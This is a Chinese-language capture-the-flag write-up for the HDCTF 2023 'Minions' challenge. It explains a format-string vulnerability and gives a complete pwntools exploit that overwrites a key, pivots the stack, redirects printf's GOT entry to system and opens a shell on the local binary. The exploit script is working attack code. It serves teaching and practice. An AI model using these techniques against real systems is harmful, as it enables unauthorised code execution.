fmtstr::[HDCTF 2023]Minions

1775458677264-ddf1b091-7b00-4dd9-947b-8e0590cdc99f.png 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
int __fastcall main(int argc, const char **argv, const char **envp)
{
  _BYTE buf[48]; // [rsp+0h] [rbp-30h] BYREF

  init(argc, argv, envp);
  vuln();

"""
int vuln()
{
  char buf[208]; // [rsp+0h] [rbp-D0h] BYREF

  puts("Welcome to HDCTF.What you name?\n");
  read(0, buf, 0xD0u);
  printf("Hello,");
  return printf(buf);
}
"""

  puts("\nDo you have an invitation key?");
  if ( key == 102 )
  {
    puts("welcome,tell me more about you");
    read(0, buf, 0x40u);
    puts("That's great.Do you like Minions?");
    read(0, &hdctf, 0x28u);
  }
  else
  {
    puts("sorry,you can't in");
  }
  return 0;
}
1
2
3
4
int system_w()
{
  return system("echo HDCTF");
}

看到整个题目,思路还是非常清晰的:

  1. 首先利用 vuln 的格式化字符串漏洞先修改.bss 段上的 key 值进行绕过
  2. 由于 if 中第一个 read 函数溢出长度不足,我们可以使用栈迁移迁回 vuln 函数复用格式化字符串漏洞
  3. 再次利用格式化字符串漏洞将 printf.plt 修改为 system.plt
  4. 再次进入 if,在第一个 read 的时候读取/bin/sh 触发 system(‘/bin/sh’)
1775463396162-000e81ec-8af9-42e9-b046-582925ed778e.png 
1
2
3
4
5
.bss:00000000006010A0                 public key
.bss:00000000006010A0 key             dd ?                    ; DATA XREF: main+26↑r
.bss:00000000006010A4                 align 20h
.bss:00000000006010C0                 public hdctf
.bss:00000000006010C0 hdctf           db    ? ;               ; DATA XREF: main+60↑o

EXP:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
from pwn import *

elf = ELF('./minions')
# libc = ELF('./libc.so.6')
context(arch=elf.arch, os=elf.os, log_level = 'debug')
p = process('./minions')

p.recvuntil(b'Welcome to HDCTF.What you name?\n\n')
payload1 = fmtstr_payload(6,{0x6010A0:0x66})
p.send(payload1)

p.recvuntil(b'welcome,tell me more about you\n')
# vuln_addr = 0x400706
start_addr = elf.sym['_start']
payload2 = b'a'*0x38 + p64(start_addr)
p.send(payload2)
p.sendafter(b"That's great.Do you like Minions?\n",b'aaaa')

p.recvuntil(b'Welcome to HDCTF.What you name?\n\n')
payload3 = fmtstr_payload(6,{elf.got['printf']:elf.plt['system']})
p.send(payload3)   

p.recvuntil(b'welcome,tell me more about you\n')
p.send(payload2)
p.sendafter(b"That's great.Do you like Minions?\n",b'aaaa')

p.recvuntil(b'Welcome to HDCTF.What you name?\n\n')
p.send(b'/bin/sh\x00')

p.interactive()


这里提醒几点,

  1. 一般来说都是修改 got 为 plt 表进行篡改
  2. 这里对 send 和 sendline 要求比较严格:我们一般对 puts 的内容+\n,对 read 的内容 send 即可
  3. https://www.yuque.com/idcm/wnemg9/gwr8a8a3m8h3xomr

更新: 2026-04-06 17:35:38
原文: https://www.yuque.com/idcm/wnemg9/vss41tp1g9d15q7g